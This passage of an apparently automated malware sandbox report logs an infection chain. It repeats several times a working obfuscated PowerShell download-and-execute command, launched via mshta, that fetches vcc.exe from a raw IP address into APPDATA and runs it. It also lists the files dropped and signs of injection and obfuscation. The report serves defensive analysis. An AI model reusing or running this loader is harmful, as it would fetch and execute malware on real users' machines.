CAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: daphpvwO.pif.6.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,6_2_02893E20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_075F24A1 push esp; iretd 3_2_075F2515
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028A62A4 push 028A630Fh; ret 6_2_028A6307
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02883210 push eax; ret 6_2_0288324C
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028A60AC push 028A6125h; ret 6_2_028A611D
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0289A018 push ecx; mov dword ptr [esp], edx6_2_0289A01D
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0289606B push 028960A4h; ret 6_2_0289609C
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0289606C push 028960A4h; ret 6_2_0289609C
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288C1C6 push 0288C61Eh; ret 6_2_0288C616
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028A61F8 push 028A6288h; ret 6_2_028A6280
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028A6144 push 028A61ECh; ret 6_2_028A61E4
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288617A push 028861BEh; ret 6_2_028861B6
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288617C push 028861BEh; ret 6_2_028861B6
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288F600 push 0288F64Dh; ret 6_2_0288F645
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288C498 push 0288C61Eh; ret 6_2_0288C616
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288F4F4 push 0288F56Ah; ret 6_2_0288F562
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02892410 push ecx; mov dword ptr [esp], edx6_2_02892412
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288F5FF push 0288F64Dh; ret 6_2_0288F645
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028A5854 push 028A5A3Ah; ret 6_2_028A5A32
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02892EDA push 02892F87h; ret 6_2_02892F7F
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02892EDC push 02892F87h; ret 6_2_02892F7F
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288BE18 push ecx; mov dword ptr [esp], edx6_2_0288BE1D
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893F84 push 02893FBCh; ret 6_2_02893FB4
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02899FB4 push ecx; mov dword ptr [esp], edx6_2_02899FB9
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02885D9E push 02885DFBh; ret 6_2_02885DF3
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02885DA0 push 02885DFBh; ret 6_2_02885DF3
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288CDE0 push 0288CE0Ch; ret 6_2_0288CE04
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893D40 push 02893D82h; ret 6_2_02893D7A
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0041C40C push cs; iretd 11_2_0041C4E2
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00423149 push eax; ret 11_2_00423179
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0041C50E push cs; iretd 11_2_0041C4E2
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004231C8 push eax; ret 11_2_00423179
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Roaming\vcc.exeFile created: C:\Users\user\Links\daphpvwO.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\vcc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.dllJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\vcc.exeFile created: C:\Users\user\Links\daphpvwO.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028964E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_028964E4
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
